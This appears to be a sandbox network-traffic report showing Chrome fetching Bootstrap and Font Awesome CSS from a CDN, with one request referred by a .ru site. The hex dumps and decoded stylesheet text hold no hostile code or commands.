                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 73 75 62 74 6c 65 3a 23 65 32 65 33 65 35 3b 2d 2d 62 73 2d 73 75 63 63 65 73 73 2d 62 67 2d 73 75 62 74 6c 65 3a 23 64 31 65 37 64 64 3b 2d 2d 62 73 2d 69 6e 66 6f 2d 62 67 2d 73 75 62 74 6c 65 3a 23 63 66 66 34 66 63 3b 2d 2d 62 73 2d 77 61 72 6e 69 6e 67 2d 62 67 2d 73 75 62 74 6c 65 3a 23 66 66 66 33 63 64 3b 2d 2d 62 73 2d 64 61 6e 67 65 72 2d 62 67 2d 73 75 62 74 6c 65 3a 23 66 38 64 37 64 61 3b 2d 2d 62 73 2d 6c 69 67 68 74 2d 62 67 2d 73 75 62 74 6c 65 3a 23 66 63 66 63 66 64 3b 2d 2d 62 73 2d 64 61 72 6b 2d 62 67 2d 73 75 62 74 6c 65 3a 23 63 65 64 34 64 61 3b 2d 2d 62 73 2d 70 72 69 6d 61 72 79 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65 3a 23 39 65 63 35 66 65 3b 2d 2d 62 73 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 72 64 65 72 2d 73 75 62 74 6c 65
                                                                                        Data Ascii: subtle:#e2e3e5;--bs-success-bg-subtle:#d1e7dd;--bs-info-bg-subtle:#cff4fc;--bs-warning-bg-subtle:#fff3cd;--bs-danger-bg-subtle:#f8d7da;--bs-light-bg-subtle:#fcfcfd;--bs-dark-bg-subtle:#ced4da;--bs-primary-border-subtle:#9ec5fe;--bs-secondary-border-subtle
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 6c 6f 72 2d 72 67 62 3a 33 33 2c 33 37 2c 34 31 3b 2d 2d 62 73 2d 74 65 72 74 69 61 72 79 2d 62 67 3a 23 66 38 66 39 66 61 3b 2d 2d 62 73 2d 74 65 72 74 69 61 72 79 2d 62 67 2d 72 67 62 3a 32 34 38 2c 32 34 39 2c 32 35 30 3b 2d 2d 62 73 2d 68 65 61 64 69 6e 67 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 2d 2d 62 73 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 2d 72 67 62 3a 31 33 2c 31 31 30 2c 32 35 33 3b 2d 2d 62 73 2d 6c 69 6e 6b 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 2d 62 73 2d 6c 69 6e 6b 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 3a 23 30 61 35 38 63 61 3b 2d 2d 62 73 2d 6c 69 6e 6b 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 2d 72 67 62 3a 31 30 2c 38 38 2c 32 30 32 3b 2d
                                                                                        Data Ascii: lor-rgb:33,37,41;--bs-tertiary-bg:#f8f9fa;--bs-tertiary-bg-rgb:248,249,250;--bs-heading-color:inherit;--bs-link-color:#0d6efd;--bs-link-color-rgb:13,110,253;--bs-link-decoration:underline;--bs-link-hover-color:#0a58ca;--bs-link-hover-color-rgb:10,88,202;-
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 2d 63 6f 6c 6f 72 2d 72 67 62 3a 31 37 33 2c 31 38 31 2c 31 38 39 3b 2d 2d 62 73 2d 73 65 63 6f 6e 64 61 72 79 2d 62 67 3a 23 33 34 33 61 34 30 3b 2d 2d 62 73 2d 73 65 63 6f 6e 64 61 72 79 2d 62 67 2d 72 67 62 3a 35 32 2c 35 38 2c 36 34 3b 2d 2d 62 73 2d 74 65 72 74 69 61 72 79 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 37 33 2c 20 31 38 31 2c 20 31 38 39 2c 20 30 2e 35 29 3b 2d 2d 62 73 2d 74 65 72 74 69 61 72 79 2d 63 6f 6c 6f 72 2d 72 67 62 3a 31 37 33 2c 31 38 31 2c 31 38 39 3b 2d 2d 62 73 2d 74 65 72 74 69 61 72 79 2d 62 67 3a 23 32 62 33 30 33 35 3b 2d 2d 62 73 2d 74 65 72 74 69 61 72 79 2d 62 67 2d 72 67 62 3a 34 33 2c 34 38 2c 35 33 3b 2d 2d 62 73 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 2d 65 6d 70 68 61 73 69 73 3a 23 36 65 61 38 66 65 3b 2d 2d 62 73
                                                                                        Data Ascii: -color-rgb:173,181,189;--bs-secondary-bg:#343a40;--bs-secondary-bg-rgb:52,58,64;--bs-tertiary-color:rgba(173, 181, 189, 0.5);--bs-tertiary-color-rgb:173,181,189;--bs-tertiary-bg:#2b3035;--bs-tertiary-bg-rgb:43,48,53;--bs-primary-text-emphasis:#6ea8fe;--bs
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 61 38 36 38 66 7d 2a 2c 3a 3a 61 66 74 65 72 2c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 6e 6f 2d 70 72 65 66 65 72 65 6e 63 65 29 7b 3a 72 6f 6f 74 7b 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 73 6d 6f 6f 74 68 7d 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 73 69 7a 65 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74
                                                                                        Data Ascii: order-color:#ea868f}*,::after,::before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}body{margin:0;font-family:var(--bs-body-font-family);font-size:var(--bs-body-font-size);font-weight:var(--bs-body-font
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 72 65 6d 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 72 65 6d 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 2e 73 6d 61 6c 6c 2c 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 6d 61 72 6b 2c 6d 61 72 6b 7b 70 61 64 64 69
                                                                                        Data Ascii: adding-left:2rem}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}.small,small{font-size:.875em}.mark,mark{paddi
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 6f 64 79 2c 74 64 2c 74 66 6f 6f 74 2c 74 68 2c 74 68 65 61 64 2c 74 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 7d 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 3a 6e 6f 74 28 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 29 7b 6f 75 74 6c 69 6e 65 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72
                                                                                        Data Ascii: ody,td,tfoot,th,thead,tr{border-color:inherit;border-style:solid;border-width:0}label{display:inline-block}button{border-radius:0}button:focus:not(:focus-visible){outline:0}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inher
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 63 6f 6c 6f 72 2d 73 77 61 74 63 68 2d 77 72 61 70 70 65 72 7b 70 61 64 64 69 6e 67 3a 30 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 3a 3a 66 69 6c 65 2d 73 65 6c 65 63 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 6f 75 74 70 75 74
                                                                                        Data Ascii: bkit-appearance:textfield}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-color-swatch-wrapper{padding:0}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}::file-selector-button{font:inherit;-webkit-appearance:button}output
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 69 6c 64 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 7d 2e 69 6e 69 74 69 61 6c 69 73 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 3e 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 2e 62
                                                                                        Data Ascii: ild){margin-right:.5rem}.initialism{font-size:.875em;text-transform:uppercase}.blockquote{margin-bottom:1rem;font-size:1.25rem}.blockquote>:last-child{margin-bottom:0}.blockquote-footer{margin-top:-1rem;margin-bottom:1rem;font-size:.875em;color:#6c757d}.b
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 7b 6d 61 78 2d 77 69 64 74 68 3a 31 33 32 30 70 78 7d 7d 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 78 6c 3a 31 34 30 30 70 78 7d 2e 72 6f 77 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 3b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77
                                                                                        Data Ascii: ,.container-xxl{max-width:1320px}}:root{--bs-breakpoint-xs:0;--bs-breakpoint-sm:576px;--bs-breakpoint-md:768px;--bs-breakpoint-lg:992px;--bs-breakpoint-xl:1200px;--bs-breakpoint-xxl:1400px}.row{--bs-gutter-x:1.5rem;--bs-gutter-y:0;display:flex;flex-wrap:w


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        101192.168.2.449861104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:56 UTC576OUTGET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: text/css,*/*;q=0.1
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: style
                                                                                        Referer: https://getplancgfe.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:56 UTC948INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:56 GMT
                                                                                        Content-Type: text/css; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: W/"656632a7-54f3"
                                                                                        Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 752975
                                                                                        Expires: Wed, 22 Oct 2025 12:46:56 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pt8sVuX0%2FRODh9BmiJrxLiB%2BN3DqoVpPA3kczHXO7HAoXHVCIwLhp%2F99PYMOK8wWBbadd8KH1mPw7r1RXIBzZG9vJitddRJAzKfAbkGonMOcVMXtzton3GjhL9%2BSBLBbz%2F2nw8kq"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd90ab71478b-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:56 UTC421INData Raw: 37 62 66 63 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 35 2e 30 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 33 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                                        Data Ascii: 7bfc/*! * Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2023 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 63 6c 61 73 73 69 63 2c 2e 66 61 2d 72 65 67 75 6c 61 72 2c 2e 66 61 2d 73 6f 6c 69 64 2c 2e 66 61 72 2c 2e 66 61 73 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 46 72 65 65 22 7d 2e 66 61 2d 62 72 61 6e 64 73 2c 2e 66 61 62 7b 66 6f 6e 74 2d 66 61 6d 69 6c
                                                                                        Data Ascii: cale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-famil
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 70 75 6c 6c 2d 6c 65 66 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                                                                                        Data Ascii: pull-left{float:left;margin-right:var(--fa-pull-margin,.3em)}.fa-pull-right{float:right;margin-left:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0s);animation-de
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a
                                                                                        Data Ascii: ation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1));animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74
                                                                                        Data Ascii: fa-animation-delay,0s);animation-delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animat
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69
                                                                                        Data Ascii: n:var(--fa-animation-duration,2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-ti
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74
                                                                                        Data Ascii: sition-duration:0s;transition-duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65
                                                                                        Data Ascii: 0);transform:scale(1) translateY(0)}to{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}}@keyframes fa-bounce{0%{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce
